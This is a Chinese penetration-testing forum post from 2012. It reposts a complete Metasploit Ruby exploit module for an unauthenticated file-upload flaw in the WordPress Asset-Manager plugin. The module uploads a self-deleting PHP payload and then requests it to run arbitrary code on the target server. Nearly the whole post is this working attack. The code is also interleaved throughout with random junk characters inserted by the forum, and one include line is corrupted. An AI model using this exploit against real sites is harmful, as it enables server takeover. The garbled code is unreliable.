找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1987|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。. B2 t6 C1 j( z9 K
: a9 t) C8 l/ j) _
##, B3 K- {8 T, z7 M8 g& j( X" ^% F) W
# This file is part of the Metasploit Framework and may be subject to
8 Z9 A' s5 c  a# redistribution and commercial restrictions. Please see the Metasploit# _4 N4 ?" ^  k' q3 C7 N
# Framework web site for more information on licensing and terms of use.
$ ?0 S5 Q$ ~4 a1 Y5 x) v! d#   http://metasploit.com/framework/
2 ?! ~* O5 t9 O+ ~5 G  G##
) N8 |, f, I+ S ( ?- F# U8 g* o' D
require 'msf/core'
6 Z8 f% S6 @' }) o" Hrequire 'msf/core/exploit/php_exe'
  W) N/ k% o) D% p9 ]
4 r$ p; K6 y3 p' n/ [" Vclass Metasploit3 < Msf::Exploit::Remote
, R3 x8 `+ X. r: Z( O  Rank = ExcellentRanking  m& F% P3 t+ b  y( Z. Y. K6 Y/ Q
) ~9 P( a1 x" ?5 [* ]
  include Msf::Exploit::Remote::HttpClient- ?6 j+ O( I' D) n' K5 U
  include Msf::Exploit:hpEXE
1 J4 {2 ]; S  B# Y3 x, ~ 2 v+ _9 q2 u* T8 }& U+ `* h8 M
  def initialize(info = {})
' V$ ?6 i) I! p2 s+ a    super(update_info(info,. I8 {- C% i7 ~, q. U* g
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 e* m: p9 x5 o' p      'Description'    => %q{
5 H/ t5 V0 J" H        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
9 i2 `! x( x, S- Y        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
( S% a* [, @5 G        temp directory without authentication, which results in arbitrary code execution.
/ i8 z( Q) Y6 h6 v% e      },
; i% h2 v+ z$ ]' `      'Author'         =>( |( s$ V- i% w* _* R2 B& W
        [
2 W3 m. G9 R6 Z          'Sammy FORGIT', # initial discovery) ~- K6 N. B* L7 ?: h
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& b4 V6 ^9 J- K5 N/ b$ C! [5 _        ],8 ?7 k  o: U4 e" K
      'License'        => MSF_LICENSE,
8 e2 ^% b# g7 I4 p5 g7 s      'References'     =>4 b, u4 h9 y, A  a
        [) e/ `& Q% \$ D( c. M' y" s
          [ 'OSVDB', '82653' ],9 [8 {% g, n& q$ R4 Q0 @, d
          [ 'BID', '53809' ],4 K( j0 s( \) P( y
          [ 'EDB', '18993' ],% C" H5 U" Q8 P3 l  `
          [ 'URL', 'http:// www.myhack58.com /' ]; |2 W% U1 k1 s2 F1 G5 B8 I: r8 b
        ],
& o  ?+ o1 k; ~8 ^& P. g      'Payload'       =>" d$ V4 I. {, _0 D
        {0 I8 P/ s( ]+ g& B& A
          'BadChars' => "\x00",
% r' `2 A# K- w6 f        },2 m' ]# ~3 Y% f, P, o
      'Platform'       => 'php',* e$ u9 v( Y6 v+ K
      'Arch'           => ARCH_PHP,+ g- M0 m8 S7 ~+ ?% ?" F0 a8 D. j
      'Targets'        =>0 a( e1 a, e/ K
        [/ `2 I8 T& p& @% h- Q
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],& L2 r( Y% r2 h+ R0 t9 E3 y
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]0 N' D: ~. r+ r! K  ~1 t6 t
        ],
4 ^4 w5 [& v2 u, z- Y+ G) Z# x      'DefaultTarget' => 0,
- L$ ]; ?9 a% Z; e4 e      'DisclosureDate' => 'May 26 2012'))
, Q  O& R# U0 r/ |! V3 W
3 i% o$ b9 @2 {. \( y1 o    register_options(
' I2 r; N* O; L9 D1 w7 f3 p" K      [
% ~* K; y' X) Z& O% ?' G        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']). E: D& T- m6 A3 E8 S5 _
      ], self.class)
! B0 j7 F1 q5 I3 Z  `  end# f  S7 ?0 n- r$ W# q( H

" K" `- d1 d  g' L" o" z  def exploit! w( i6 \* b) k7 a, `. I
    uri =  target_uri.path3 [/ q* M% C+ m( G4 n* b* J
    uri << '/' if uri[-1,1] != '/'8 K  |7 v: ^5 K. o
    peer = "#{rhost}:#{rport}"- I7 @( ]# A. w
    payload_name = "#{rand_text_alpha(5)}.php"( L& o; N: \5 |8 q! r
    php_payload = get_write_exec_payload(:unlink_self=>true)5 p* @, k8 h" H7 Z$ V) E0 `9 F& e/ R
# C1 p9 A) L) {9 j$ L. ]( R
    data = Rex::MIME::Message.new# i" R" s, l" s9 c0 @9 k
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
! s6 ]. i: s3 o) F1 R' A4 X    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
1 A* r+ D+ }  S* y) p; K ! L; p3 l, X7 b% _
    print_status("#{peer} - Uploading payload #{payload_name}")1 ^4 J( V7 {& U% T& _  Z
    res = send_request_cgi({( k6 G; B* a# U* b) m
      'method'  => 'POST',; u/ e' d; L% B/ G2 w2 k3 T1 q
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
- ?: Q# K- K# ^; O3 @0 V: j4 f      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
) {/ ?* R/ o% U5 N- i- m      'data'    => post_data
% O8 v$ X: ?0 {+ S7 ^/ o" n    })- q( x8 ^+ @' }( [5 ]  _: u% B
3 w8 u0 m4 y# ~, r6 ?# r
    if not res or res.code != 200 or res.body !~ /#{payload_name}/7 ^# z6 O* H  @. K
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")8 M0 @8 x8 r' b5 }: p
end
" l4 X6 p( E( }7 U& H
- H$ m+ B% d5 F+ y9 y. J6 ]; K/ Q8 S% D    print_status("#{peer} - Executing payload #{payload_name}")0 \. h* H  ~# w" F1 N
    res = send_request_raw({* P  c* m2 W1 i/ L
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",. J- t! O" W( q$ ?, w+ T& C; H
      'method'  => 'GET'
( B' A$ r* j9 q( L3 I( l    })
3 t! h* R1 W7 M" q) L) Q) c$ p5 p
% q. @$ J9 w  K& N2 d7 }    if res and res.code != 200
. P; Y  d# P4 u5 O; t5 W; ~      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! u4 @  z: {# ?8 V, M
    end
, L7 X) U3 C7 }/ z  end- t: y0 f4 A) A" K6 M, ?) m
end
+ ^% r1 b  U5 l" D
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表